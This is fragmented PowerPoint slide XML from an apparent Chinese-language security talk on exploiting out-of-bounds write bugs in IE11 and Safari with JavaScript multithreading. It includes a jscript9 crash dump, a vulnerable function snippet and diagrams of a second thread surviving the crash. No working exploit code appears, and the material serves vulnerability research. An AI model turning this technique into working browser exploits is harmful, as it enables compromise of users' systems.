              <a:rPr lang="it-IT" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 0x2d0aede01016: addb   %al, (%rax)    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>0x2d0aede01018: addb   %al, (%rax)    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>0x2d0aede0101a: addb   %al, (%rax)    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>0x2d0aede0101c: addb   %al, (%rax)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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64301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073551" y="2063900"/>
            <a:ext cx="5582920" cy="694055"/>
            <a:chOff x="9752" y="1772"/>
            <a:chExt cx="8792" cy="1093"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11468" y="1907"/>
              <a:ext cx="7076" cy="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多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线程利用越界写漏洞介绍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9752" y="1772"/>
              <a:ext cx="1255" cy="1093"/>
              <a:chOff x="9752" y="1636"/>
              <a:chExt cx="1255" cy="1093"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="六边形 12"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9752" y="1636"/>
                <a:ext cx="1255" cy="1093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9924" y="1771"/>
                <a:ext cx="579" cy="82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 smtClean="0"/>
                  <a:t>0</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/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6073551" y="3046245"/>
            <a:ext cx="4511040" cy="694055"/>
            <a:chOff x="9752" y="1772"/>
            <a:chExt cx="7104" cy="1093"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11468" y="1907"/>
              <a:ext cx="5388" cy="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IE11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越界写漏洞利用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9752" y="1772"/>
              <a:ext cx="1255" cy="1093"/>
              <a:chOff x="9752" y="1636"/>
              <a:chExt cx="1255" cy="1093"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="六边形 17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9752" y="1636"/>
                <a:ext cx="1255" cy="1093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9924" y="1771"/>
                <a:ext cx="910" cy="8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/>
                  <a:t>03</a:t>
                </a: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6073551" y="4028590"/>
            <a:ext cx="4751070" cy="694055"/>
            <a:chOff x="9752" y="1772"/>
            <a:chExt cx="7482" cy="1093"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="文本框 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11468" y="1907"/>
              <a:ext cx="5766" cy="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Safari</a:t>
              </a:r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越界写漏洞利用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9752" y="1772"/>
              <a:ext cx="1255" cy="1093"/>
              <a:chOff x="9752" y="1636"/>
              <a:chExt cx="1255" cy="1093"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="六边形 22"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9752" y="1636"/>
                <a:ext cx="1255" cy="1093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4" name="文本框 23"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9924" y="1771"/>
                <a:ext cx="910" cy="8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/>
                  <a:t>04</a:t>
                </a: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1387475" y="2257425"/>
            <a:ext cx="3282950" cy="2764790"/>
            <a:chOff x="2185" y="3359"/>
            <a:chExt cx="5170" cy="4354"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="文本框 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3186" y="4275"/>
              <a:ext cx="3168" cy="18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7200" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>目录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3526" y="6208"/>
              <a:ext cx="2488" cy="62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>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>CONTENTS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="六边形 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2185" y="3359"/>
              <a:ext cx="5170" cy="4355"/>
            </a:xfrm>
            <a:prstGeom prst="hexagon">
              <a:avLst/>
            </a:pr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6073551" y="5010935"/>
            <a:ext cx="2710815" cy="694055"/>
            <a:chOff x="9752" y="1772"/>
            <a:chExt cx="4269" cy="1093"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="文本框 29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11468" y="1907"/>
              <a:ext cx="2553" cy="8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 smtClean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总结展望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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="组合 30"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9752" y="1772"/>
              <a:ext cx="1255" cy="1093"/>
              <a:chOff x="9752" y="1636"/>
              <a:chExt cx="1255" cy="1093"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="六边形 31"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9752" y="1636"/>
                <a:ext cx="1255" cy="1093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3" name="文本框 32"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9924" y="1771"/>
                <a:ext cx="910" cy="82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800" b="1" dirty="0"/>
                  <a:t>05</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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5700" y="409575"/>
            <a:ext cx="1598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总结</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;QA</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800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75766" y="1317812"/>
            <a:ext cx="68490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更加复杂功能的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>更稳定的漏洞利用实现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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80336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362"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-159609" y="45361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9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10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205127" y="413236"/>
            <a:ext cx="5848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</a:rPr>
              <a:t>01.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>越界</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>写漏洞漏洞利用难度</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="36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375815" y="1627632"/>
            <a:ext cx="71000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越界写的数据：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>完全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>控制，部分控制，不可控制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>越界写的长度：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>完全控制，部分控制，不可控制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3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753454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1387" y="424210"/>
            <a:ext cx="1014572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/>
              <a:t>浏览器漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>过程中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>出了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个整数下溢导致的越界写，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>越界写的长度很大，当写到不可</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>写入内存后，程序不可避免的的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>crash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="278448" y="1933576"/>
            <a:ext cx="969927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(920.814): Access violation - code c0000005 (!!! second chance !!!)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eax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=80000002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ebx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=01fec1e0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0" err="1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ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1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=ffff247c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0" err="1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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0" err="1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fffffffb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1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esi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=01fec1e0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edi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=02023000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eip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=6ac91be4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esp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=02b7bb10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ebp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=02b7bb20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iopl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       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nv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up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ei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ng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nz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pe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nc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cs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=001b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=0023  ds=0023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=0023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fs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=003b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gs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=0000            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efl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=00010286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jscript9!Js::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SparseArraySegment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&lt;void *&gt;::ClearElements+0x10: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6ac91be4 f3ab            rep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stos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dword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ptr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es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:[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1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edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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zh-CN" altLang="zh-CN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68266" y="3812273"/>
            <a:ext cx="939131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569CD6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void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SparseArraySegment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&lt;T&gt;::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ClearElements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__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out_ecount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Field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(T)* elements, uint32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T fill =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SparseArraySegment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&lt;T&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetMissingItem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altLang="zh-CN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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uint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altLang="zh-CN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 &lt;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len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++)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elements[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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] = fill;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altLang="zh-CN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altLang="zh-CN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H="1" flipV="1">
            <a:off x="3257662" y="5219696"/>
            <a:ext cx="349622" cy="71356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3125564" y="5801133"/>
            <a:ext cx="21425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0xfffffffb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2405538" y="5685918"/>
            <a:ext cx="22622" cy="5310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019955" y="6138565"/>
            <a:ext cx="25873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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x80000002</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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94281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69188" y="140470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多线程利用越界写漏洞背景</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1389888" y="1792224"/>
            <a:ext cx="968044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/>
              <a:t>浏览器已经支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>多线程执行了。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>	let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>myWorker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t> = new Worker('worker.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>的多核架构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>同一时间可以并发运行多个线程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 362"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="100367" y="242406"/>
            <a:ext cx="1170336" cy="442460"/>
            <a:chOff x="-204402" y="-104115"/>
            <a:chExt cx="2340668" cy="884917"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 360"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-204402" y="-104115"/>
              <a:ext cx="1737317" cy="884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9" h="19925" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3319" y="3995"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1512" y="4055"/>
                    <a:pt x="40" y="6659"/>
                    <a:pt x="1" y="9925"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-33" y="12749"/>
                    <a:pt x="1046" y="15212"/>
                    <a:pt x="2568" y="15829"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3254" y="16107"/>
                    <a:pt x="3967" y="15957"/>
                    <a:pt x="4611" y="15464"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4837" y="15291"/>
                    <a:pt x="5054" y="15076"/>
                    <a:pt x="5253" y="14815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5426" y="14589"/>
                    <a:pt x="5584" y="14328"/>
                    <a:pt x="5750" y="14085"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6449" y="13063"/>
                    <a:pt x="7297" y="12321"/>
                    <a:pt x="8221" y="12384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9802" y="12493"/>
                    <a:pt x="10930" y="14811"/>
                    <a:pt x="12055" y="16793"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12255" y="17146"/>
                    <a:pt x="12459" y="17491"/>
                    <a:pt x="12667" y="17828"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14327" y="20160"/>
                    <a:pt x="16573" y="20582"/>
                    <a:pt x="18461" y="18916"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20360" y="17240"/>
                    <a:pt x="21567" y="13743"/>
                    <a:pt x="21560" y="9912"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21552" y="6115"/>
                    <a:pt x="20352" y="2659"/>
                    <a:pt x="18468" y="1007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16158" y="-1018"/>
                    <a:pt x="13380" y="75"/>
                    <a:pt x="11787" y="3711"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11560" y="4228"/>
                    <a:pt x="11367" y="4787"/>
                    <a:pt x="11135" y="5288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10428" y="6820"/>
                    <a:pt x="9394" y="7807"/>
                    <a:pt x="8265" y="7766"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7375" y="7735"/>
                    <a:pt x="6541" y="7033"/>
                    <a:pt x="5830" y="6035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5522" y="5603"/>
                    <a:pt x="5237" y="5116"/>
                    <a:pt x="4904" y="4750"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4427" y="4227"/>
                    <a:pt x="3876" y="3976"/>
                    <a:pt x="3319" y="39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000000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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Shape 361"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1729885" y="135466"/>
              <a:ext cx="406381" cy="406381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25400" tIns="25400" rIns="25400" bIns="25400" numCol="1" anchor="ctr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1600"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37003549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右箭头 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1901952" y="1146048"/>
            <a:ext cx="6998208" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B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JavaScript thread2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1921764" y="2066544"/>
            <a:ext cx="4206240" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B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JavaScript thread1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901952" y="3633216"/>
            <a:ext cx="1280160" cy="621792"/>
          </a:xfrm>
          <a:prstGeom prst="round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流程图: 可选过程 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2010156" y="3868043"/>
            <a:ext cx="8205216" cy="408623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下箭头 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5888736" y="2563237"/>
            <a:ext cx="448056" cy="1304806"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>触发漏洞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9497568" y="2042363"/>
            <a:ext cx="2060448" cy="408623"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -29850"/>
              <a:gd name="adj2" fmla="val 427019"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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Crashed 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3889248" y="5623691"/>
            <a:ext cx="978408" cy="484632"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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6010656" y="3743528"/>
            <a:ext cx="4204716" cy="733663"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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Memory outbound write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8807" y="5200472"/>
            <a:ext cx="1206734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/>
              <a:t>JavaScript th1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>触发漏洞之后，我们就无法在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>th1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>代码了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>但是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t> th2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>我们还可以执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3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3026414" y="82064"/>
            <a:ext cx="57246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/>
              <a:t>多线程利用越界写漏洞原理</a:t>
            </a:r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25348716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右箭头 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1901952" y="1146048"/>
            <a:ext cx="6998208" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B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JavaScript thread2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3" name="右箭头 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921764" y="2066544"/>
            <a:ext cx="4206240" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B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JavaScript thread1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1901952" y="3633216"/>
            <a:ext cx="1280160" cy="621792"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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5" name="流程图: 可选过程 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2010156" y="3868043"/>
            <a:ext cx="8205216" cy="408623"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess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6" name="下箭头 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5888736" y="2563237"/>
            <a:ext cx="448056" cy="1304806"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D05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FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>触发漏洞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7" name="圆角矩形标注 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9497568" y="2042363"/>
            <a:ext cx="2060448" cy="408623"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -29850"/>
              <a:gd name="adj2" fmla="val 427019"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
